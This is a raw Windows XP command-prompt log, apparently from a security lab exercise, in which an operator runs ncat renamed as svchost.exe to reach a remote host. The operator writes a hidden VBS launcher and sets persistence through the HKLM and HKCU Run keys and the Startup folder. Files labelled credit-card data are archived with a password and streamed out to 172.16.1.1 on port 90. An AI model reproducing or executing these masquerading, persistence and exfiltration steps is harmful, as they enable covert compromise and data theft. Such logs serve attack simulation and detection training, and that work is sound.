Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system>
C:\WINDOWS\system>C:\Users\SecurityNik\Downloads>svchost.exe 10.0.0.102 80 --nodns --ssl -4
C:\WINDOWS\system>echo > SUWtHEh_XP_ncat.vbs
echo > SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>dir SUWtHEh_XP_ncat.vbs
dir SUWtHEh_XP_ncat.vbs
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:01 AM 13 SUWtHEh_XP_ncat.vbs
1 File(s) 13 bytes
0 Dir(s) 6,713,962,496 bytes free
C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>type C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
type C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Dim WShell >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = CreateObject("WScript.Shell") >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0 >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>
C:\WINDOWS\system>C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>echo Set WShell = Nothing >> SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>type SUWtHEh_XP_ncat.vbs
type SUWtHEh_XP_ncat.vbs
ECHO is on.
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0
Set WShell = Nothing
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "c:\windows\system\SUWtHEh_XP_VBS.vbs",0
Set WShell = Nothing
C:\WINDOWS\system>del SUWtHEh_XP_ncat.vbs
del SUWtHEh_XP_ncat.vbs
C:\WINDOWS\system>reg add HKLM\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
The operation completed successfully
C:\WINDOWS\system>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
VBoxTray REG_SZ C:\WINDOWS\system32\VBoxTray.exe
SUWtHEh_XP_ncat REG_SZ wscript c:\windows\system\SUWtHEh-XP.vbs
C:\WINDOWS\system>reg add HKCU\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v SUWtHEh_XP_ncat /d "wscript c:\windows\system\SUWtHEh-XP.vbs"
Value SUWtHEh_XP_ncat exists, overwrite(Y/N)? Y
The operation completed successfully
C:\WINDOWS\system>reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
! REG.EXE VERSION 3.0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
SUWtHEh_XP_ncat REG_SZ wscript c:\windows\system\SUWtHEh-XP.vbs
C:\WINDOWS\system>C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Setti
C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Setti
C:\WINDOWS\system>copy SUWtHEh-XP.vbs "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
copy SUWtHEh-XP.vbs "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
1 file(s) copied.
C:\WINDOWS\system>dir c:\
dir c:\
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of c:\
03/11/2018 03:40 AM <DIR> ARCHIVED-FILES
12/30/2017 01:36 PM 0 AUTOEXEC.BAT
12/30/2017 01:36 PM 0 CONFIG.SYS
01/08/2018 12:31 AM <DIR> Dev-Cpp
03/11/2018 02:59 AM <DIR> Documents and Settings
02/02/2018 03:16 AM <DIR> Inetpub
01/27/2018 06:06 PM <DIR> MySymbols
01/04/2018 04:01 AM <DIR> New Folder
03/09/2018 03:04 AM <DIR> Program Files
01/04/2018 03:47 AM <DIR> Python27
01/22/2018 02:57 AM 223 sc.txt
01/09/2018 03:12 AM <DIR> TEST-FTP
03/11/2018 06:16 PM <DIR> tmp
03/12/2018 02:14 AM <DIR> WINDOWS
3 File(s) 223 bytes
11 Dir(s) 6,712,721,408 bytes free
C:\WINDOWS\system>dir c:\archived-files\
dir c:\archived-files\
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of c:\archived-files
03/11/2018 03:40 AM <DIR> .
03/11/2018 03:40 AM <DIR> ..
03/04/2018 02:09 AM 1,045,970 1-MB-Test.docx
03/04/2018 02:10 AM 10,723,331 10-MB-Test.docx
03/04/2018 02:09 AM 10,471,397 10-MB-Test.xlsx
03/11/2018 03:40 AM <DIR> BIO-DATA
03/04/2018 02:01 AM 4,748 Credit-Card-data.csv
03/04/2018 02:02 AM 183,081 Credit-Card-data.pdf
03/04/2018 02:02 AM 33,792 Credit-Card-data.xls
03/04/2018 02:07 AM 219,783 data1.xlsx
03/11/2018 03:40 AM <DIR> HISTORICAL-DATA
7 File(s) 22,682,102 bytes
4 Dir(s) 6,712,721,408 bytes free
C:\WINDOWS\system>7za.exe a -y -r -tzip -p XP-data.zip c:\ARCHIVED-FILES\*
7za.exe a -y -r -tzip -p XP-data.zip c:\ARCHIVED-FILES\*
7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
Scanning
Creating archive XP-data.zip
Enter password (will not be echoed):Testing1
Compressing 1-MB-Test.docx
Compressing 10-MB-Test.docx
Compressing 10-MB-Test.xlsx
Compressing Credit-Card-data.csv
Compressing Credit-Card-data.pdf
Compressing Credit-Card-data.xls
Compressing data1.xlsx
Everything is Ok
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.2 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.2 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>[A[B
[A[B
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,693,003,264 bytes free
C:\WINDOWS\system>dir XP*.*
dir XP*.*
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM 19,640,434 XP-data.zip
1 File(s) 19,640,434 bytes
0 Dir(s) 6,693,003,264 bytes free
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < c:\tmp\XP-data.zip
C:\WINDOWS\system>
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,692,737,024 bytes free
C:\WINDOWS\system>dir
dir
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM <DIR> .
03/12/2018 03:18 AM <DIR> ..
03/12/2018 03:16 AM 587,776 7za.exe
04/14/2008 08:00 AM 69,584 AVICAP.DLL
04/14/2008 08:00 AM 109,456 AVIFILE.DLL
04/14/2008 08:00 AM 32,816 COMMDLG.DLL
03/12/2018 03:14 AM 0 copy
03/12/1997 12:00 AM 194,736 JSCRPT16.DLL
04/14/2008 08:00 AM 2,000 KEYBOARD.DRV
04/14/2008 08:00 AM 9,936 LZEXPAND.DLL
04/14/2008 08:00 AM 73,376 MCIAVI.DRV
04/14/2008 08:00 AM 25,264 MCISEQ.DRV
04/14/2008 08:00 AM 28,160 MCIWAVE.DRV
04/14/2008 08:00 AM 68,768 MMSYSTEM.DLL
04/14/2008 08:00 AM 1,152 MMTASK.TSK
04/14/2008 08:00 AM 2,032 MOUSE.DRV
04/14/2008 08:00 AM 126,912 MSVIDEO.DLL
04/14/2008 08:00 AM 82,944 OLECLI.DLL
04/14/2008 08:00 AM 24,064 OLESVR.DLL
03/12/1997 12:00 AM 141,456 SCHNL16.DLL
04/14/2008 08:00 AM 59,167 setup.inf
04/14/2008 08:00 AM 5,120 SHELL.DLL
04/14/2008 08:00 AM 1,744 SOUND.DRV
04/14/2008 08:00 AM 5,532 stdole.tlb
03/11/2018 04:39 PM 43 SUtype
03/12/2018 03:07 AM 173 SUWtHEh-XP.vbs
03/12/2018 02:23 AM 43 SUWtHEh.bat
03/12/2018 02:21 AM 1,667,584 svchost.exe
04/14/2008 08:00 AM 3,360 SYSTEM.DRV
04/14/2008 08:00 AM 19,200 TAPI.DLL
04/14/2008 08:00 AM 4,048 TIMER.DRV
04/14/2008 08:00 AM 9,008 VER.DLL
04/14/2008 08:00 AM 2,176 VGA.DRV
04/14/2008 08:00 AM 13,600 WFWNET.DRV
04/14/2008 08:00 AM 146,432 WINSPOOL.DRV
03/12/2018 03:18 AM 19,640,434 XP-data.zip
34 File(s) 23,158,096 bytes
2 Dir(s) 6,692,671,488 bytes free
C:\WINDOWS\system>dir XP*.*
dir XP*.*
Volume in drive C has no label.
Volume Serial Number is D86F-1D13
Directory of C:\WINDOWS\system
03/12/2018 03:18 AM 19,640,434 XP-data.zip
1 File(s) 19,640,434 bytes
0 Dir(s) 6,692,671,488 bytes free
C:\WINDOWS\system>svchost --nodns --verbose --listen 172.16.1.1 90 < XP-data.zip
svchost --nodns --verbose --listen 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>svchost --nodns --verbose 172.16.1.1 90 < XP-data.zip
svchost --nodns --verbose 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>svchost.exe --nodns --verbose 172.16.1.1 90 < XP-data.zip
svchost.exe --nodns --verbose 172.16.1.1 90 < XP-data.zip
C:\WINDOWS\system>